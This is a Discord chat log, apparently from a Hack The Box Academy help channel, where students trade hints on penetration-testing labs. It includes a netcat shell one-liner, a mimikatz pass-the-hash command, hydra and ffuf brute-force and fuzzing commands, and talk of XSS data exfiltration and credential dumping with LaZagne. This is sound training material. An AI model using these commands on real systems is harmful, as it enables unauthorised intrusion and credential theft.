read the #rules and you will find out. Anyway, wrong place to be asking. cya

Read #rules and #welcome

Hey just checking if anyone has done the intro into assembly language assessment 1

I have modified and changed and recreated the code multiple times but I am unsure what to put in for answer

Please someone on here must be able to guide me in right direction I have done the second assessment

If you decrypt and run the code it will print a flag in the HTB{} format

ok thank you what am I decrypting though what part?

just python decoder isnt part of the gdb and I am running that with modified code I have even resulted to check with ai to see if im missing something and my code I know xor turning it into 8bytes does that decrypt it?

well the task comes with a loaded_shellcode.zip

and you have to decode it by xoring everything like it says

and the result is shellcode that you can run that prints the flag

ok maybe i am way off track so do decode it in the gdb or seperate with the python program

damm im so lost with this one it has been like +50 houurs on it any chance I could personally message you my code u could have look for me?

sorry to be pain mate just out of options I have even tried the ai

sure, I can try to remember how its done lol

I did that recently and just remember you need to loop thru the stack 8 bytes at a time

have you would be ok to send you my code so you can see if my codes right then tell me what to actually get for the decoding I really am lost on it thank you for replying people

I am lost if it will come up as finish product the HTB{} or 0xnwand39 code that i use python to decrypt

pwn

Send to me I can check later

Hello Hekers!
I am planing to purchase CDSA using Student Subscription.After research I came to know that “SOC Analyst Prerequisites” is a prerequisite to start this course. My question is that will I get free access to “SOC Analyst Prerequisites” skill set module?

Yep, all modules up to and including tier 2

Also you don't get the cdsa voucher with student sub

Just got the admin flag for AD Enumeration & Attacks - Skills Assessment Part I. It seems to me like there are multiple ways to skin this cat, ||I used crackmapexec and proxychains to more out the flag on the admins desktop|| Been seeing a lot of folks recommend ligolo, so I think I'm going to redo this scenario using it instead of proxychains. Am I off base with the multiple ways to do this one, or am I on the right track?

you’re on track, ligolo makes things easier and once you master it, you won’t go back to proxychains xd

hi guys, I'm getting an error on the module JAVASCRIPT DEOBFUSCATION / Section Decoding, when solving the exercise, I know I cannot say the flags obtained here but following all the instructions I get the error that the flag is wrong when I'm pretty sure it's right, how can I show here without revealing the flag itself just to get some help?...

I know the answer is right since the excercise is very very easy to complete, and the response I'm getting is obviously a string that looks like a flag, I need a hand

What is the exact question

av catches it tho

Using what you learned in this section, determine the type of encoding used in the string you got at previous exercise, and decode it. To get the flag, you can send a 'POST' request to 'serial.php', and set the data as "serial=YOUR_DECODED_OUTPUT". @manic onyx

I could send the screens here but it would reveal the flag for others so

Use cURL

yes I used, can I send you a DM?

Sure

Anyone who has completed the intro to deserialization skill assessment II, task 2?

in the "Intro to threat hunting with the elastic stack" this statement is made: If we inspect network connections leveraging Sysmon Event ID 3 (Network connection) around the time this file was downloaded, we'll find that Sysmon has no entries. This is a common configuration to avoid capturing network connections created by browsers, which could lead to an overwhelming volume of logs, particularly those related to our email provider. This is where Zeek logs prove invaluable

since zeek is still analyzing the traffic over the network, how would zeek capture less traffic since its still capturing all traffic over the network?

just trying to wrap my head around it

Replace YOUR_DECODED_OUTPUT with... the decoded output

Sysmon and Zeek serve different purposes and operate in different levels on the TCP/IP stack as so, they do different stuff.

Sysmon is primarily for endpoint monitoring, and zeek is used for network security monitoring.

Sysmon can't capture traffic coming and going from a router for example, it only captures traffic that reaches or departs an endpoint. Zeek can capture traffic across the whole network.

In the section is stated that is not practical to use event ID 3 because the sheer amount of junk you'll be capturing. As so, is more useful to use the zeek logs, and filter only for DNS queries.

Hi, about "ADVANCED XSS AND CSRF EXPLOITATION - XSS Filter Bypasses", I am trying to use ||<object data="data:text/html;base64,etc ||, to as usual ||use xhr to download a page and exfiltrate it||. This code bypasses the xss protection and runs the javascript but with errors.
If running in the console I get : "Uncaught DOMException: A network error occurred.", and in the exfiltrate.htb I get "SyntaxError: The URI is malformed.", even though my javascript is the same as usual and the URI is /home.php here.
Any hint ?

Did you close the bracket?

If you mean about the ||<object || then yes, it is shortened here for easiness.

Gotcha

Just wanted to be sure

Anyone who's used elastic got any tips for viewing the results of a search, I'm using the Pwnbox but there is a tiny bar which i have to scroll through to see the results, it shows one line at a time and is really fiddly

Target: 94.237.55.163:37053
Life Left: 87 minute(s)

• 1 Run a sub-domain/vhost fuzzing scan on '*.academy.htb' for the IP shown above. What are all the sub-domains you can identify? (Only write the sub-domain name)

ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.94.237.55.163:37053/

can someone help me understand why am i only getting errors?

dw got it

Full screen the pwnbox

I need some help understanding something. I often see the different usage off the domains and domains trust in the AD Lab. Such as FREIGHTLOGISTICS.LOCAL and INLANEFREIGHT.LOCAL. I understand that there is some kind of domain trusts going between these two domains. But what i dont really understand is that is this two different domain controllers? Do they have different ip adresses? Or is it strickly inherited and only used by the main domain controller?

Cause when i look at the /etc/hosts file in the linux attacker machine it seems like each subdomain under the domain has their own ip adresses

hello , is there anyone finished introduction to nosql injection skill assessment || ?

Thank you for the insight

any mods i can talk to in regards of a target machine in the academy ?

Hi I'm on the introduction to Windows and when I try to connect in RDP with the target, that's don't works

I use the correct command because I can connect myself to the target but the connection is always fall.

Mods aren't staff

okay. how do i get in touch with staff ?

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Green bubble on the academy site

thanks marcie

Firewall and IDS/IPS Evasion - Easy Lab

I can't even see the IDS status page. Just get a timeout. Have reset the box multiple times. Is there a known issue with the box or am I doing something wrong?

NVM, my Kali box was broken somehow

Anyone completed advanced xss and csrf skill assessment? I can redirect myself but I never get promoted

Hi, if you are already there, maybe you can help about this ? : #modules message

I could get the bypass to work with <object> tag

Where should I go if I'm new here?

What was the issue? I'm stuck on this last one and finished the rest of the course

did you change the query? the last action should be ||SMB::FILE_DELETE||

Read #welcome

Does the admin user open all file types in the advances xss and csrf skill assessment?

Thank you. I did just delete but I guess you have to combine. Weird. Thank you

ok thanks

I'm working on the noSQL injection module skills assessment II and could use a hand crafting the injection.|| I can get the login page to 500 out, but thats as deep as i can get. ||

is the admin user broken for the advanced xss and csrf? I'm using the exfiltrate server to test if the xss ever pops and it does when I visit the uploaded file but I never get any requests from the admin.

I got the feeling the ||<object> tag|| is in a different scope and doesn't have access to the origin cookies, was it an issue you had to solve ?
Asking because the request to /home fails.

I could only get it to pop an alert, ended up using a payload from a cheat sheet they linked to at the bottom of the guide instead

ah ok.... makes more sense

Anyone who completed the intro to deserialization attacks?

Stuck on Skill Assessment Task 2

i need tool brute force netcat server

Working on it too, I assume that I have to do something with token reset page, but I still didn't get it

Hey guys,
for weeks now i am stuck on the ad module Skill Assesment 1... I pwned the WIN-01 Machine and got the tpe*** user on MS01. I also got the Hash for Administrator using DCSync. But i just cant pass the hash to the DC01. Can anyone help ?

Indeed it seems the ||<object>|| didn't have access to origin, but there is another payload in the link that does. I can now exfiltrate correctly from the user, but not yet from admin, at least not consistently from admin : hard to know if it is a real issue, since there are always weird unpredictible latencies in the "deliver to victim" feature.
EDIT : it worked, just had to wait around 15 minutes for the admin request to reach exfiltrate.htb.... weird...

why can't you pth?

im using this command from the MS01 machine to Pivot to the DC01 machine but it only opens a shell on the MS01 machine again @next bronze

||mimikatz # sekurlsa::pth /user:Administrator /domain:INLANEFREIGHT /ntlm:admin-hash /target:172.16.6.3||

mimikatz will open a shell as the user you pth as but on the same host, so if you want to use mimikatz you'll need to psremote or connect read the flag over smb

try psexec.py

so you mean chisel tunnnel Kali VM -> MS01 and the psexec to DC01?

pth directly

I've just started HTB a few days ago and on a section about basic service exploiting. There's only 1 open service running, openssh v8.4p1. There are no metasploit exploits for it thoguh so I'm fully lost on what to do...

psexec.py from MS01 -> DC01 ?

I guess psexec.py should work from your attacker machine

you can also use evil-winrm

anyone?

Problem is i wont reach the DC in the local Network from my attack box, so i would need some kind of pivoting like chisel right?

yes

can someone explain this to me?

Did you try more in depth scans for services? Scan every port

Nmap -p- <IP>

Let me know how you get on with the skill assessment

Was a bit blind and didn't look at the port they gave me. Scanning it found an exploit I could use 😄

How long does a usualy full nmap enumaration go with sC and sV enabled?

For top ports it’s quick. For all ports it can be 5ish mins

whenever i'm bruteforcing an ssh enabled acct, am I always able to use hydra against FTP instead?

depends

1. ftp has to be enabled
2. they have to be using the same authentication source

when those two factors are true then sure

how can I be sure about 2?

You dont

its usually true though

damn i thought there was a clue in NMAP or something

sometimes ssh uses an RSA key pair

that too in which you couldnt brute ssh anyways

usually hydra or cme will tell you that it can't because password auth isn't enabled

alright i think im officially stuck in password attacks module, credential hunting in linux section. I cant find Kiras pw. the hint suggest i use the password.list from resources against it. nothing found.. the hint also gives the users pw but that pw doesnt work to SSH into the machine. made a mutated pw list (love.list) based off that pw in the hint using hashcat, "hashcat love.list -r custom.list --stdout | sort -u > mut_love.list". from here i tried a few things with hydra, "hydra -l Kira -P mut_love.list ssh://<target> -V -t 48" used password.list in there from resouces provided as well, no hits.. am I missing something?

Hi guys module skills assessment for sqlmap, I found two entry point a**.php and ac***n.php trying to fuzz some parameters because the response show me SQL error, I'm on the right way? because I can't find any parameters to try injection

lowercase kira; second make it a habit to do ssh as a last resort

should i default to ftp?

you should first see what services are available

and make a judgement off that

step 0: enumerate/scan

even if you're given a bunch of leading info: sometime the info assumes a few things

during my scan i did see port 21 and 22 open

got it

ssh is a generally slow service

and in some cases; it can be restricted to only 4 threads at a time

while it's not always the case; always observe best practices when attacking practice environments

and probably some services uses the same creds

i had to reset my system and lost all my notes :dead: is there anywhere online filled wwith notes for the CPTS

nope

there's no online repository of notes for a closed/paid service

take this as a lesson to always have a backup

heck my stuff is on an external drive

just gonna have to go back through and rewrite some stuff

and likely better because you should know most of it by now

okay im 2 dumb for this... I transferred chisel.exe via the provided webshell to the WEB-01 machine. However when i execute chisel.exe my shell simply dies. Can anyone guide me ?

chisel has to be running to keep the tunnel up, so the web shell will become unresponsive, as long as the chisel in your attack host is able to connect, you're good

the payload is the malicious code after u gained access right while exploit is the thing that gets u access like the shell so then why does this say Exploitation & Security: A payload is code crafted with the intent to exploit a vulnerability on a computer system. The term payload can describe various types of malware, including but not limited to ransomware.

Payloads Deliver us Shells

The payload is the malicious code that allows you to take advantage of an exploit

it's not necessarily after you gained access

oh i c

in fact it says it right there

" Exploitation & Security: A payload is code crafted with the intent to exploit a vulnerability on a computer system."

somtimes it's internal but you gotta exploit something externally first usually to gain access internally

I am looking for some guidance on thelab Brute Forcing Weak Access Tokens in the Attacking Authentication Mechanisms module. I have tried several approaches and found multiple valid tokens. However, I keep getting redirected to the "Not Authorized" page, when I try to use any of the found tokens or cookies. I feel like I am missing something (silly), or that something seems to be broken.

Has anyone successfully completed this lab?

anyone got a hint for finding the admin email address?

I'm trying to do shells & payloads, but can't RDP in the "Reverseshell" section. anybody else has similar problems?

problem persists since yesterday

this is for IMAP and POP3 sections of footprinting module?

can someone hint me like what to google to figure it out? Please don't give me answer tho I wanna be able to figure it out and learn

Imap commands, there's a link to an article buried somewhere in this chat

ok thanks

If you read the email you can generally get all the info from it

ok thanks

ok, pawnbox actually worked, but kali with remmnia / xfreerdp didn't work and also a windows workstation with rdp didn't work at all... very confusing...

Well in your own vm you need to be connected to the vpn

really, i didn"t know that..

...how are you expected to connect to an internal resource if you aren't physically plugged in.

The vpn facilitates a connection to htb resources

i was joking 😄 of course i was connected to the VPN not my first module

Listen there's too many people that are dumb for me to not think thats the case

not gonna lie sometimes i forget to connect / switch vpn to the right one, but as soon as i get my first "can't reach host" i normally remember 😄

I feel like although I learned about Rubeus, I still don't know what it's doing.

does anyone htb-student@ubuntu:~$ rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 1234 > /tmp/f
nc: Cannot assign requested address
why wont this work

the address youre listening on isn't correct

oh right hat coreect danke

finally got it, ping me if you need some help

though I have to admit, the assessment for the AD enums and attacks module is super cool I feel like all of the things i learned up to that point are being applied, from pivoting to everything else. Only downside is one thing didn't work correctly and was supposed to on the first assessment still trying to figure out what went wrong.

pretty exciting stuff.

PHP web shells - Use what you learned from the module to gain a web shell. What is the file name of the gif in the /images/vendor directory on the target? (Format: xxxx.gif)

I am following what was taught in the module but I am having whenever I upload the webshell.php file it fails

use burp

I used burp to modify the content type but it still wont upload

then something was wrong

Mhh

There was an extra step that needed to be taken that was not mentioned in the module

Can i get some help for Exploiting Web Vulnerabilities in Thick-Client Applications.

I cant seem to compile it again.

breaks everything

hard to share without giving out info so

What

when i recompile for the download of the jar file it breaks the application. I tried to follow the cource but i cant seem to get it. Been stuck now for a while

What app do you use to recompile

javac

I see

What is the error prompt?

i dont get an error. It just wont download the file at all

The thing is that it looks weird when editing the file as well. since all the lines starts with

/*  223   */

Or something

but not the code thats been edited

which makes me think thats what breaks it, but as its a comment that doesnt make sense really

you might have messed up the formatting while editing it, I would suggest transferring the files out and edit them in vscode or something, also you can follow a walkthrough of fatty

From what I've heard the section is now more comprehensive

oh did they update it? that's good

Apparently it's now more "follow the section" than "here's something that you likely will rarely ever see"

nice to have a insane challenge on a "attacking common applications" lol

which one , this is my next module

Exploiting Web Vulnerabilities in Thick-Client Applications.

pheew

Attacking Common Services , is my next 🙂

this one

for user.txt

https://0xdf.gitlab.io/2020/08/08/htb-fatty.html

the pain for me is just that i have to either transfer a java file on and off and on and off. Or edit using default notepad

good night, good fight 🙂

yeah thats it for me

Working the footprinting hard box. I have access to “the user” and am looking through his files. Not sure what I’m trying to find now. See his logs, and see some docs that have unreadable characters

Hi, I'm not even in the exam, and I see the error message of Exam entrypoint ips have been moved to a new location at the top of my page on academy. Does it happen for someone else?

Hey @placid edge did you have issues with the first assesment of the AD attacks/enums module?

I had a bit of trouble with getting the 2nd account js

Is anybody else having issues with OpenVAS installation on the vulnerability assessment modules? It is not installing at all

more time wasted on disconnecting machines and unreliable service

i can rdp through packet radio better than this, a premium service.

just terminated both instances

i really dont have any time for this lame shit.

Did you figure this one out?

Nope, took a break

There's a service you haven't found yet

Still better than PEN-200

the discord users carry everyone for that course since the forums are long dead.

johnCkirk the legend

💐

Stuck on WINDOWS PRIVILEGE ESCALATION: Communication with Processes
Question: Which account has WRITE_DAC privileges over the \pipe\SQLLocal\SQLEXPRESS01 named pipe?

I got the thing as in pic but why the answer is not been accept as ||NT SERVICE||

did you put the \ in your answer?

the answer is in your screen shot

copy and paste it starting from NT and ending at the number

DONE
thanks..!
I got confused as i saw some different hint given by some one in the forums...

Hi currently working on User Enumeration via Response Timing from white-box attacks, is there a way to get a shorter wordlist, the one suggested by the module is to big and I'm currently getting a lot of usernames enumerated, thanks for any help

Shells & payloads Live Engagement - I made a payload with msfvenom, I uploaded a webshell and navigated to the directory, I checked for exploits and attempted metasploit. None have worked so far. Any tips or hints on this?

Are you kidding me lol

Can anyone give me a nudge on the AD Skills Assessment? I'm in an RDP session on MS01 trying to find the cleartext password for the user in question. Using mimikatz with "sekurlsa::logonpasswords" shows the user and the NTLM hash, but I am unable to crack it. The other mimikatz commands do not show that user.

There doesn't seem to be a rhyme or reason as to what users show up for what commands.

kerberos::list /export did not give the username

Also, running "Get-DomainUser * -spn | select samaccountname" does not show this username.

The only way I found the username was on C:\Users, and it seemed to be a pretty obvious account

username is tp***y so that those that have done this know if I'm on the right track

How do I go about getting a plaintext password?!

The output for the tp***y user looks like this, this is just a different user as an example so that there are no spoilers

did u u try checking comments?

Which comments?

I cracked the NTLM for svc_sql just to make sure it wasn't the hashcat mode. svc_sql worked.

i know the password it wont be in a list

So should I use a rule? random numbers?

i was thinking it might be in a comment or something

since the question asks for plaintext

the module mentions a bunch of different enumeration methods for credentials, what have you tried besides just mimikatz

i dont remember how i answered it. it was a while ago

i was thinking maybe try the ldap filter

Get-DomainUser -Identity t****y | Get-DomainSPNTicket -Format Hashcat

That didn't work

before messing with other networked stuff that you would have already had access to, what other post compromise enumeration can you do on the box

I just did this question, the current way of it is not working properly, you wont see the cleartext following the correct approach, I managed to get it by using lazagne.

Rubeus did not work either

what else

Will you dm me?

why spoil it

smh

I'm guessing the NTLM hash should crack with hashcat?

it's not like that; there is no way to get the answer as of right now without some serious help from the forums.

Incorrect

hmmmm

the tools and stuff don't give the cleartext.

yes they do

you literally just listed one

that's not the right tool for the approach; even if you used it, it would point to the wrong account.

doesnt to my memory

sure you interpreted it right?

what is the dpapi section of the module

if I show the pic with the error it will spoil the intended approach

to me it was the intended approach

I didnt use the forums

you think so? interesting.

it was a taught method that works

I wouldn't have thought of using Lazagne as it wasn't mentioned anywhere in the module

the active directory and the attacking common applications modules are the most brutal

lazagne was covered in password attacks

the course modules presume you have done the prior ones

I'll admit the assessment really has been a fun experience putting everything you learned in the other modules to use ^^

https://www.coresecurity.com/core-labs/articles/reading-dpapi-encrypted-keys-mimikatz

I was looking back at the password attacks module. Hadn't got to lazagne yet

why are you skipping modules

dont do that

making shit harder for yourself for no reason

yeah i tried everything from stealing the SAM database and trying to crack the hash too @heavy marsh

good mindset but wont give you the answer

iirc secretsdump can work too but idr for sure

wasn't skipping, was just reading back

lol

LaZagne didn't work, 0 passwords found

u can skip modules if you want to

ah k it sounded like you hadnt done it

no, I knew they are intended to be done in order, so I've stuck with that

you can skip but dont cry about it if things end up harder because you missed prior taught info

thats all

proverbial you ftr

I have each module in markdown so that I can find stuff from previous ones easily if I can't see it in my notes

so without LaZagne I'm not sure, I'll keep looking at the password attacks options

As long as someone can confirm that the NTLM hash is not crackable that makes me feel better

try secretsdump

run lazagne as admin btw

Isn't secretsdump a python program?

yeah but it gets dpapi i think

secretsdump is rad

I'm running powershell from the rdp session

sometimes ill dump admin ntlm hash just so I can run secretsdump instead of mimilatz lul

u gotta run powershell as admin and then run lazagne thru it

whole point of secretsdump is you use it remotely

mimkatz is good 🙂

its detected irl tho, like everywhere

yeah which is why I prefer to lower my reliance on it as much as reasonable to do so

still good and easy to make undetected

secretsdump not dropping files to disk(iirc) is rad

https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/

yeah I ain't pretending it's perfectly stealthy or anything

lazagne just runs and disappears when I run it from powershell

I saw it said shahash found, but no cleartext

sure lazagne copied properly? sounds like an error if it found nothing

It showed output in realtime but then the cmd window closed

what? how did you run it?

that sounds like you just double clicked it or something

No, it was strange. I'm going to make it an early night. I'll try again tomorrow.

Thank you all for the help!

run powershell as admin then run it thru that

u gotta right click -> run as admin

I did. I saw some weird output on the defaultpassword section to the effect of "supersecretdomainpassword" or something like that.

Yeah I ran powershell as admin

¯_(ツ)_/¯

I'll start with a fresh machine tomorrow.

that's the right password tho

I cant see a reason why it would close the window

I'm going to look for an output of what lazagne normally looks like so I know when I try it again.

you can redirect the output to a text file if its closing the window

¯_(ツ)_/¯

The password that showed was in no way connected to the username so I don't know how that all works

It just said defaultpassword

Tried that too.

yeah and?

No file came out

then you did it wrong

Like I said, lots of weird things going on, going to try again tomorrow with a fresh machine.

where is a ticket dude i need assistance @_@

defaultpassword is a normal field you can see creds stored in sometimes

there isn't one.

ptt

oki , thank you 😄 so im in the pssword attacks attacking lsass

pass the ticket

and the screen keeps jumping when i try to type

the subscription dont come with free private tutors @terse igloo the discord operates as a tax deductible charity

and no input comes out

anyway I'm passing the ticket to ransomthehost, have a good night all!

i dont need a tutor

i need the rdp to work properly

https://tenor.com/view/police-fun-ticket-make-it-rain-gif-14274528

gn

anywho, outside of getting an answer i did ask about , i dont need a tutor 😄

what's a ticket person?

someone who answers the box in academy

: P

i put in ticket

what?

just use that chat on the website

@_@

this is discord the charity

ohhhhhh you a silver academy peep?

yes

i pay for both labs and academy

ah Ive never seen someone actually get timely help from that

the charity is better

I mean no shit you pay for academy lul

xD

this is fact

youre better off just clearly asking your question and explaining your problem

instead of just saying I need help and a box is bouncing

well, as i stated above 🙂 i cannot type in the rdp cmd prompt , the terminal jumps and no type

sir, have you tried turning it off and on again?

yes mam

what does terminal jump mean

meaning

it wil jump to the bottom

and what are you using for rdp

screenshot?

and i am a mam is what i mean jinn 😄

excuse me ma'am

danke'

i can share you the shot

? I dont see a problem

its a photo

not a vide o

no shit

its not in motion

the problem accurs in motion

xfreerdp /v:<ip> /u:htb-student /p:"HTB_@cademy_stdnt!" /cert:ignore /workarea

try using /workarea at the end

ok thank you ^^

do you mean like you cant see the start menu cause of the resolution?

no, i mean i go to type a letter to start my syntax

and the minute i hit a key

the screen jumps up and i gotta scroll up to it to see if it typed at all

but nope

is it ANY letter that does this?

yes

what kind of keyboard are you using

just my regular keyboard

@_@ why

the keys arent the issue trust 😄

did you try /workarea at teh end

because I could see a scenario where youre using an atypical keyboard layout and its mismatched with the remote machine and interpreting keypresses as other keys. Thats why I ask.

also did you try jinns suggestion yet

for me it's mom coming into the basement to deliver me a pizza pocket that scolds my mouth as i eat it and falls into the [SHIFT] key lodging it stuck and enabling sticky keys on windows

what a nightmare omg

no no lol not at all

so youre using an american US keyboard layout?

lmao

yes no?

😂

ya

its a pretty simple question

if you dont want to take your problem seriously why should I

good luck

i already did ^^